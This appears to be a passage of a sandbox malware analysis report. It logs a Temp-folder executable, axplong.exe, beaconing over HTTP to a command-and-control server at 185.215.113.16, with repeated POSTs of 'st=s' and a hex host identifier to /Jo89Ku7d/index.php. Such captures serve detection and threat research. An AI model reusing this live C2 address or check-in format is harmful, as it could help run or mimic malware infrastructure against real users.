                        Sep 26, 2024 15:43:02.984669924 CEST8052374185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:02.984814882 CEST5237480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.107544899 CEST5237480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.107871056 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.112890005 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:03.112982988 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.113059998 CEST8052374185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:03.113106966 CEST5237480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.113107920 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.118186951 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:03.908499002 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:03.908579111 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.911488056 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:03.916253090 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:04.136341095 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:04.136409998 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.250124931 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.250562906 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.524049997 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:04.524136066 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.524219990 CEST8052375185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:04.524279118 CEST5237580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.524465084 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:04.534322023 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.249052048 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.249315023 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.252619028 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.257406950 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.485574007 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.485735893 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.593499899 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.593826056 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.598648071 CEST8052377185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.598711967 CEST8052376185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:05.598809004 CEST5237680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.598835945 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.599240065 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:05.604096889 CEST8052377185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:06.310586929 CEST8052377185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:06.310874939 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.314234972 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.314234972 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.320662022 CEST8052378185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:06.320754051 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.320986986 CEST8052377185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:06.320991993 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.321038008 CEST5237780192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:06.326951027 CEST8052378185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.055228949 CEST8052378185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.055489063 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.173609018 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.173913002 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.179481983 CEST8052378185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.179637909 CEST8052379185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.179856062 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.180129051 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.180152893 CEST5237880192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.185909986 CEST8052379185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.908143044 CEST8052379185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.908246040 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.911017895 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.911499023 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.916157961 CEST8052379185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.916213036 CEST5237980192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.916604996 CEST8052380185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:07.916680098 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.917090893 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:07.922049999 CEST8052380185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:08.688188076 CEST8052380185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:08.688261986 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.800374031 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.800721884 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.805550098 CEST8052380185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:08.805736065 CEST5238080192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.808815956 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:08.808897972 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.809166908 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:08.815066099 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.506697893 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.506947994 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.509749889 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.514584064 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.860450029 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.860964060 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.984189034 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.984544039 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.989379883 CEST8052382185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.989394903 CEST8052381185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:09.989447117 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.989476919 CEST5238180192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.989684105 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:09.994786024 CEST8052382185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:10.696933985 CEST8052382185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:10.697189093 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.699994087 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.700573921 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.705899954 CEST8052382185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:10.705956936 CEST5238280192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.706619978 CEST8052383185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:10.706688881 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.706916094 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:10.712917089 CEST8052383185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:11.436655045 CEST8052383185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:11.436723948 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.553189993 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.553812981 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.558844090 CEST8052384185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:11.558921099 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.559017897 CEST8052383185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:11.559072018 CEST5238380192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.560424089 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:11.565220118 CEST8052384185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:12.329565048 CEST8052384185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:12.329652071 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.332474947 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.332819939 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.337527990 CEST8052384185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:12.337594986 CEST5238480192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.337872028 CEST8052385185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:12.337990046 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.338247061 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:12.343110085 CEST8052385185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.036628962 CEST8052385185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.036684990 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.141021967 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.141422033 CEST5238680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.146500111 CEST8052386185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.146579981 CEST5238680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.146893024 CEST5238680192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.149544001 CEST8052385185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.149590015 CEST5238580192.168.2.6185.215.113.16
                        Sep 26, 2024 15:43:13.152054071 CEST8052386185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.868077993 CEST8052386185.215.113.16192.168.2.6
                        Sep 26, 2024 15:43:13.868129969 CEST5238680192.168.2.6185.215.113.16
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 15:41:39.754065037 CEST5365367162.159.36.2192.168.2.6
                        Sep 26, 2024 15:41:40.251178980 CEST5363853192.168.2.61.1.1.1
                        Sep 26, 2024 15:41:40.260466099 CEST53536381.1.1.1192.168.2.6
                        Sep 26, 2024 15:41:41.357029915 CEST6476353192.168.2.61.1.1.1
                        Sep 26, 2024 15:41:41.366497040 CEST53647631.1.1.1192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 26, 2024 15:41:40.251178980 CEST192.168.2.61.1.1.10xdd87Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        Sep 26, 2024 15:41:41.357029915 CEST192.168.2.61.1.1.10xd8f7Standard query (0)86.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 26, 2024 15:41:40.260466099 CEST1.1.1.1192.168.2.60xdd87Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        Sep 26, 2024 15:41:41.366497040 CEST1.1.1.1192.168.2.60xd8f7Name error (3)86.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        • 185.215.113.16
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.652319185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:02.719383001 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:03.542167902 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:03.544769049 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:03.781316042 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.652320185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:03.894004107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:04.775163889 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:04.776247978 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:05.142745972 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.652321185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:05.253216028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:05.976547956 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:05.977672100 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:06.215785027 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.652322185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:06.332247019 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:07.408618927 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:07.409511089 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:07.632118940 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.652323185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:07.753185034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:08.455849886 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:08.456764936 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:08.693679094 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.652324185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:08.815917015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:09.586147070 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:09.587032080 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:09.810935020 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.652325185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:09.925278902 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:10.620050907 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:10.620804071 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
